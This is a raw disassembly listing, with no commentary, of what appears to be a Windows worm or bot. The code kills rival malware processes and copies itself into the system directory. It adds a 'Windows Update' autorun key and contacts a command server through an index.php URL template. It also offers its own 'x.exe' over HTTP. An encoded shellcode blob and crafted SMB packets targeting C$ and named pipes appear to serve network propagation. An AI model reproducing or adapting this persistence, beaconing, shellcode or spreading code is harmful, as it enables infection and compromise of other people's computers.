cmp edi, eax
jz short loc_30902648
call sub_30902009
test eax, eax
jz short loc_309026B3
push offset dword_30904FD4
call dword_309010D4 ; InterlockedIncrement
push edi
call sub_309017D2
test eax, eax
pop ecx
jnz short loc_309026BA
push edi
push offset sub_30902536
call sub_30901F23
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3090269F: ; CODE XREF: sub_30902622+8D�j
push edi
push offset sub_3090259A
call sub_30901F23
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3090269F
jmp short loc_309026BA
; ---------------------------------------------------------------------------
loc_309026B3: ; CODE XREF: sub_30902622+51�j
push 2710h
call ebx ; Sleep
loc_309026BA: ; CODE XREF: sub_30902622+67�j
; sub_30902622+8F�j
movzx edi, word_30904FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_3090236F
test eax, eax
jz loc_30902648
pop edi
pop esi
pop ebx
loc_309026DB: ; CODE XREF: sub_30902622+11�j
push 0
call dword_309010D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_30902622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309026E9 proc near ; CODE XREF: UPX0:309027B7�p
; UPX0:loc_3090281D�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_30901FCA
push eax
call dword_3090115C ; inet_ntoa
mov esi, dword_30901068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push dword_30904FCC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3090111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_309042BA
call esi ; lstrcpy
push offset byte_309042B8
call dword_30901084 ; lstrlen
mov byte_309042B8[eax], 0DFh
pop esi
leave
retn
sub_309026E9 endp
; ---------------------------------------------------------------------------
loc_30902745: ; DATA XREF: sub_30902383+16C�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_30904FD4, ebx
call sub_30902009
mov esi, dword_30901094
mov edi, 1388h
test eax, eax
jnz short loc_30902773
loc_30902767: ; CODE XREF: UPX0:30902771�j
push edi
call esi ; Sleep
call sub_30902009
test eax, eax
jz short loc_30902767
loc_30902773: ; CODE XREF: UPX0:30902765�j
lea eax, [esp+14h]
push ebx
push eax
call dword_30901130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_30904FD8, ebx
pop ebp
mov word_30904FDC, 96h
jz short loc_309027B0
mov dword_30904FD8, 1
mov ebp, 15Eh
mov word_30904FDC, 14h
loc_309027B0: ; CODE XREF: UPX0:30902796�j
call sub_30901FCA
mov ebx, eax
call sub_309026E9
cmp ebx, 100007Fh
jz short loc_309027D1
push ebx
push offset sub_30902536
call sub_30901F23
pop ecx
pop ecx
loc_309027D1: ; CODE XREF: UPX0:309027C2�j
mov dword ptr [esp+10h], 4
loc_309027D9: ; CODE XREF: UPX0:309027EA�j
push ebx
push offset sub_3090259A
call sub_30901F23
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_309027D9
test ebp, ebp
jle short loc_30902801
loc_309027F0: ; CODE XREF: UPX0:309027FF�j
push 0
push offset sub_30902622
call sub_30901F23
pop ecx
dec ebp
pop ecx
jnz short loc_309027F0
loc_30902801: ; CODE XREF: UPX0:309027EE�j
; UPX0:3090280D�j ...
call sub_30902009
test eax, eax
jz short loc_3090280F
push edi
call esi ; Sleep
jmp short loc_30902801
; ---------------------------------------------------------------------------
loc_3090280F: ; CODE XREF: UPX0:30902808�j
; UPX0:3090281B�j
call sub_30902009
test eax, eax
jnz short loc_3090281D
push edi
call esi ; Sleep
jmp short loc_3090280F
; ---------------------------------------------------------------------------
loc_3090281D: ; CODE XREF: UPX0:30902816�j
call sub_309026E9
jmp short loc_30902801
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902824 proc near ; CODE XREF: sub_309029BD+8C�p
; sub_30902B37+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jnz short loc_30902857
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
loc_30902857: ; CODE XREF: sub_30902824+1C�j
pop ebp
retn
sub_30902824 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902859 proc near ; CODE XREF: sub_30902195+33�p
; sub_309029BD+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jz short loc_30902885
push 1
pop eax
jmp short loc_309028AF
; ---------------------------------------------------------------------------
loc_30902885: ; CODE XREF: sub_30902859+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_30901008 ; RegQueryValueExA
test eax, eax
jz short loc_309028A4
push 2
pop esi
loc_309028A4: ; CODE XREF: sub_30902859+46�j
push [ebp+arg_10]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_309028AF: ; CODE XREF: sub_30902859+2A�j
pop esi
leave
retn
sub_30902859 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309028B2 proc near ; CODE XREF: sub_30902A6B+96�p
; sub_30902B37+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901000 ; RegCreateKeyExA
test eax, eax
jz short loc_309028DB
push 1
pop eax
jmp short loc_30902902
; ---------------------------------------------------------------------------
loc_309028DB: ; CODE XREF: sub_309028B2+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901004 ; RegSetValueExA
test eax, eax
jz short loc_309028F7
push 2
pop esi
loc_309028F7: ; CODE XREF: sub_309028B2+40�j
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_30902902: ; CODE XREF: sub_309028B2+27�j
pop esi
pop ebp
retn
sub_309028B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902905 proc near ; CODE XREF: sub_309029BD+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_30901084 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_309029B9
loc_30902925: ; CODE XREF: sub_30902905+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_3090292E
dec esi
jns short loc_30902925
loc_3090292E: ; CODE XREF: sub_30902905+24�j
push 0
push 2
call sub_30902CFC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_309029B9
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_30902CF6 ; Process32First
test eax, eax
jz short loc_309029B9
lea esi, [esi+ebx+1]
loc_30902976: ; CODE XREF: sub_30902905+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_30901104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_309029A6
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_309010B0 ; OpenProcess
push 0
push eax
call dword_30901060 ; TerminateProcess
loc_309029A6: ; CODE XREF: sub_30902905+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_30902CF0 ; Process32Next
test eax, eax
jnz short loc_30902976
loc_309029B9: ; CODE XREF: sub_30902905+1A�j
; sub_30902905+38�j ...
pop esi
pop ebx
leave
retn
sub_30902905 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309029BD proc near ; CODE XREF: UPX0:3090234C�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_30902A26: ; CODE XREF: sub_309029BD+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jnz short loc_30902A5D
push ebx
push edi
push esi
call sub_30902824
lea eax, [ebp+var_138]
push eax
call sub_30902905
add esp, 10h
loc_30902A5D: ; CODE XREF: sub_309029BD+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_30902A26
pop edi
pop esi
pop ebx
leave
retn
sub_309029BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902A6B proc near ; CODE XREF: sub_30902B37+D1�p
; sub_30902B37+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_30902A80
push [ebp+arg_0]
call dword_30901074 ; DeleteFileA
loc_30902A80: ; CODE XREF: sub_30902A6B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3090108C ; GetSystemDirectoryA
test eax, eax
jz locret_30902B35
push esi
call dword_309010FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_30901F44
mov esi, dword_30901088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_309041F0
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset dword_309041F8
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_30901050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_30901084 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_309028B2
add esp, 14h
push dword_30904FC4
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_30901054 ; WinExec
push 1F4h
call dword_30901094 ; Sleep
push 0
call dword_309010E0 ; ExitProcess
pop esi
locret_30902B35: ; CODE XREF: sub_30902A6B+23�j
leave
retn
sub_30902A6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902B37 proc near ; CODE XREF: UPX0:30902351�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_30901048 ; GetModuleFileNameA
test eax, eax
jz loc_30902C70
and dword_30904FE0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jz short loc_30902BBD
call dword_309010FC ; rand
push 0Ah
mov ebx, offset aEeedtqfdbhbqod ; "eeedtqfdbhbqod"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_30901F44
pop ecx
pop ecx
push ebx
call dword_30901084 ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_309028B2
add esp, 14h
jmp short loc_30902BCC
; ---------------------------------------------------------------------------
loc_30902BBD: ; CODE XREF: sub_30902B37+4D�j
lea eax, [ebp+var_20]
push eax
push offset aEeedtqfdbhbqod ; "eeedtqfdbhbqod"
call dword_30901068 ; lstrcpy
loc_30902BCC: ; CODE XREF: sub_30902B37+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_30902859
add esp, 14h
test eax, eax
jz short loc_30902C12
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_309028B2
lea eax, [ebp+var_84]
push eax
push 0
call sub_30902A6B
add esp, 1Ch
jmp short loc_30902C70
; ---------------------------------------------------------------------------
loc_30902C12: ; CODE XREF: sub_30902B37+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3090104C ; lstrcmpi
test eax, eax
jnz short loc_30902C5B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jnz short loc_30902C70
push ebx
push edi
push esi
mov dword_30904FE0, 1
call sub_30902824
add esp, 0Ch
jmp short loc_30902C70
; ---------------------------------------------------------------------------
loc_30902C5B: ; CODE XREF: sub_30902B37+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_30902A6B
pop ecx
pop ecx
loc_30902C70: ; CODE XREF: sub_30902B37+1F�j
; sub_30902B37+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_30902B37 endp
; =============== S U B R O U T I N E =======================================
sub_30902C75 proc near ; CODE XREF: sub_309011A0+CA�p
; sub_309015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_30901044 ; VirtualAlloc
retn
sub_30902C75 endp
; =============== S U B R O U T I N E =======================================
sub_30902C89 proc near ; CODE XREF: sub_309011A0+10B�p
; sub_309015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_30901040 ; VirtualFree
retn
sub_30902C89 endp
; ---------------------------------------------------------------------------
align 10h
loc_30902CA0: ; DATA XREF: sub_30901422+A�o
; sub_30902383+A�o
jmp dword ptr loc_30901100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CA6 proc near ; CODE XREF: sub_309017D2+128�p
; sub_309017D2+134�p ...
jmp dword_309010F8
sub_30902CA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CAC proc near ; CODE XREF: sub_309017D2+9C�p
; sub_309017D2+C5�p ...
jmp dword_309010F4
sub_30902CAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CB2 proc near ; CODE XREF: sub_309017D2+93�p
; sub_309017D2+B2�p ...
jmp dword_309010F0
sub_30902CB2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_30902CC0 proc near ; CODE XREF: sub_309017D2+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_30902CE0
loc_30902CCC: ; CODE XREF: sub_30902CC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_30902CCC
loc_30902CE0: ; CODE XREF: sub_30902CC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_30902CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CF0 proc near ; CODE XREF: sub_30902905+AB�p
jmp dword_30901064
sub_30902CF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CF6 proc near ; CODE XREF: sub_30902905+64�p
jmp dword_3090105C
sub_30902CF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CFC proc near ; CODE XREF: sub_30902905+2D�p
jmp dword_30901058
sub_30902CFC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4BFh dup(0)
dword_30904000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_30901422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309015C7+84�o
align 10h
byte_30904080 db 0 ; DATA XREF: sub_3090169C+C�r
off_30904081 dd offset dword_309041E4 ; DATA XREF: sub_3090169C+14�r
align 2
dd offset dword_309041D4
dw 0C401h
dd 1309041h, 309041B4h, 9041A000h, 41900130h, 80013090h
dd 309041h, 30904174h, 90416800h, 41580130h, 48003090h
dd 1309041h, 3090413Ch, 90417400h, 41D40130h, 30003090h
dd 309041h, 309041D4h, 90412001h, 41480030h, 10013090h
dd 309041h, 30904130h, 90410001h, 40F80130h, 74003090h
dd 309041h, 30904130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_309041D4 dd 72617778h, 6A632E65h, 656E2E62h, 74h ; DATA XREF: UPX0:30904086�o
dword_309041E4 dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_30904081�o
dword_309041F0 dd 6578652Eh, 0 ; DATA XREF: sub_309011A0+75�o
; sub_3090204F+55�o ...
dword_309041F8 dd 5Ch ; DATA XREF: sub_309011A0+49�o
; sub_30902A6B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309011A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_30901316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_30901316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_30901422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_309015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=17&cnt=%s',0
; DATA XREF: sub_309015C7+57�o
align 8
byte_309042B8 db 0EBh ; DATA XREF: sub_309017D2+24E�o
; sub_309017D2+260�o ...
db 58h
word_309042BA dw 7468h ; DATA XREF: sub_309026E9+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999AEh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_30904580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_309017D2+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3090460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_309046B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_30904798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_309017D2+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_309047FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_30904868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3090490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3090498C dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_309017D2+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_30904A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_30904A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_30904B00 dd 0 ; DATA XREF: sub_309017D2+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_30904BBE dd 1004600h ; DATA XREF: sub_309017D2+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_30904BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_309017D2+41B�o
; sub_309017D2+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
